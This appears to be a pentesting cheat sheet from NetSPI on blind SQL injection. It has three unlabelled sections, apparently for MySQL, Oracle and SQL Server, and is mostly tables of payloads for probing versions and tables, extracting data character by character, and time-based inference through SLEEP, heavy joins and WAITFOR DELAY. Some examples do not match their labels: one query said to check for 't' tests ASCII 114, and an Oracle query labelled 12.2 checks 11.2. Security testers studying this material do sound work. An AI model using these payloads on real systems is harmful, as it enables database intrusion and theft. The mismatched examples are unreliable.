Blind Injection

Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.

Partial-Blind

Partial-blind injections are queries that return HTTP Status Codes, or other markers in the HTML response, that indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).

Description Query
Version is 5.x.x SELECT substring(version(),1,1)=5
Subselect enabled SELECT 1 AND (select 1)=1
Table log_table exists SELECT 1 AND (select 1 from log_table limit 0,1)=1
Column message exists in table log_table
Note: Query should error if column doesn't exist
SELECT message FROM log_table LIMIT 0,1
First letter of first message is t SELECT ascii(substring((SELECT message from log_table limit 0,1),1,1))=114

Converting Partial-Blind queries to Full-Blind queries

Any of the above queries can be used in full-blind scenarios by using the following conversion:
SELECT IF(*PARTIAL_BLIND_QUERY*, SLEEP(5), null)

Full-Blind

Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).

Description Query
User is root SELECT IF(user() LIKE 'root@%', SLEEP(5), null)
User is root (Benchmark method) SELECT IF(user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null)
Version is 5.x.x SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null)

Blind Injection

Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.

Partial-Blind

Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).

Description Query
Version is 12.2 SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';
Subselect is enabled SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)
Table log_table exists SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);
Column message exists in table log_table Select COUNT(*) from user_tab_cols where column_name = 'MESSAGE' and table_name = 'LOG_TABLE';
First letter of first message is t Select message from log_table where rownum=1 and message LIKE 't%';

Converting Partial-Blind queries to Full-Blind queries

Any of the above queries can be used in full-blind scenarios by using the following conversion:
SELECT CASE WHEN (*PARTIAL_BLIND_QUERY*)=1 THEN (SELECT count(*) FROM all_users a, all_users b, all_users c, all_users d) ELSE 0 END FROM dual

The partial-blind query must return one row, so always attempt to use COUNT on the column being selected. Add "all_users [letter]" ad naseum until the database response slows. You may need to cycle though [letter] if the database is caching responses.

Full-Blind

Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.

Description Query
Version is 12.2 SELECT CASE WHEN (SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%11.2%')=1 THEN (SELECT count(*) FROM all_users a, all_users b, all_users c, all_users d) ELSE 0 END FROM dual

Blind Injection

Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.

Partial-Blind

Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).

Description Query
Version is 12.0.2000.8 SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
Subselect is enabled SELECT (SELECT @@version)
Table log_table exists SELECT * FROM log_table
Column message exists in table log_table SELECT message from log_table
First letter of first message is t WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'

Converting Partial-Blind queries to Full-Blind queries

Any of the above queries can be used in full-blind scenarios by using the following conversion:
IF exists(*PARTIAL_BLIND_QUERY*) WAITFOR DELAY '00:00:02'

Full-Blind

Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other out-of-band methods for attacks. A true statement will take X seconds to respond, a false statement should return immediately.

Description Query
Version is 12.0.2000.8 IF exists(SELECT @@version where @@version like '%12.0.2000.8%') WAITFOR DELAY '00:00:02'

© 2018 Copyright by NetSPI. All rights reserved.